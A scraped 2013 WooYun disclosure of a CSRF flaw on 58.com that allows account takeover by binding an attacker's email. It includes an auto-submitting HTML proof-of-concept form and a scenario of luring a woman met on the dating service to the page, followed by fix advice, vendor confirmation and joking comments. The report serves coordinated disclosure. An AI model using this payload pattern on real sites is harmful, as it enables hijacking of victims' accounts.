猥琐思路再次搞定58同城交友妹子帐号

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-016839

漏洞标题：猥琐思路再次搞定58同城交友妹子帐号

漏洞作者：风萧萧

提交时间：2013-01-02 18:45

修复时间：2013-02-16 18:46

公开时间：2013-02-16 18:46

漏洞类型：CSRF

危害等级：低

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-01-02：细节已通知厂商并且等待厂商处理中
2013-01-04：厂商已经确认，细节仅向厂商公开
2013-01-14：细节向核心白帽子及相关领域专家公开
2013-01-24：细节向普通白帽子公开
2013-02-03：细节向实习白帽子公开
2013-02-16：细节向公众公开

简要描述：

过节还发洞的都是屌丝啊

详细说明：

1.修改他人帐号密码是违法行为啊！我是好人不干坏事的，这里只是进行验证测试呢！首先登陆58同城站点：http://myl58.com，看到【安全设置】了么？准备对邮箱进行验证吧！

2.填写好要绑定的邮箱，注意这时候设置下代理哦！

3.将POST请求拦截并且取消发送，并且将这个POST请求构造一个POC页面，前面两个步骤就是这个作用咯！

<html>
<body>
<form id="fengxiaoxiao" name="fengxiaoxiao" action="http://my.58.com/submit/authmail/" method="POST">
<input type="text" name="txtEmail" value="*********@qq.com" />
<input type="submit" value="submit" />
</form>
<script>
	document.fengxiaoxiao.submit();
</script>
</body>
</html>

漏洞证明：

4.到了具体的应用场景了：你在58交友时，和一个妹子相谈甚欢，并且有意愿义结金兰。无意中在妹子登陆58的前提下，访问了上述poc页面。那么将成功绑定你设置好的邮箱！

5.OK，点击上述链接。不仅绑定了妹子帐号，同时也登陆了其58同城平台。

修复方案：

我仔细考虑了下，有下面几个问题：
1.CSRF没有做任何防范，当然其他地方也会存在；
2.关键接口没有做用户验证，比如提示用户首先输入密码才可绑定邮箱或手机，哪怕设置一个图片验证码也可防止这种情况；
3.礼物啊礼物，好久没收到了！来一个撒

版权声明：转载请注明来源风萧萧@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2013-01-04 18:19

厂商回复：

间接对用户安全造成影响，非常感谢报告漏洞，马上修复。

漏洞评价：

2013-01-02 18:47 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

岁岁有今日
2013-01-02 18:57 | cncert国家互联网应急中心(乌云厂商)

有朝一日，日复一日！
2013-01-02 19:38 | shine ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

@cncert国家互联网应急中心 @xsser 两个好基友！
2013-01-02 21:49 | 冷静 ( 路人 | Rank:3 漏洞数:2 )

对妹子这么执著,我要是个妹子,我都要嫁给你这个专情挖洞的人了
2013-01-04 21:18 | d3pT1 ( 路人 | Rank:1 漏洞数:2 | 人法地，地法天，天法道，道法自然。)

......妹子啊我不淡定了
2013-01-05 08:38 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

尼玛，这货一看就是光棍。。昨天我就顾着陪别人的媳妇过节了。。
2013-01-05 14:26 | 神刀 ( 路人 | Rank:23 漏洞数:3 | www.shellsec.com内射那么牛，虾米没妹子？)

对妹子这么执著,我要是个妹子,我都要嫁给你这个专情挖洞的人了
2013-02-16 20:01 | 小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )

有些加验证码的会把验证码返回回来直接js验证，很多设计太奇葩

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-016839

漏洞标题：猥琐思路再次搞定58同城交友妹子帐号

相关厂商：58同城

漏洞作者：风萧萧

提交时间：2013-01-02 18:45

修复时间：2013-02-16 18:46

公开时间：2013-02-16 18:46

漏洞类型：CSRF

危害等级：低

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源风萧萧@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-016839

漏洞标题：猥琐思路再次搞定58同城交友妹子帐号

相关厂商：58同城

漏洞作者： 风萧萧

提交时间：2013-01-02 18:45

修复时间：2013-02-16 18:46

公开时间：2013-02-16 18:46

漏洞类型：CSRF

危害等级：低

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-016839"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 风萧萧@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：风萧萧

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源风萧萧@乌云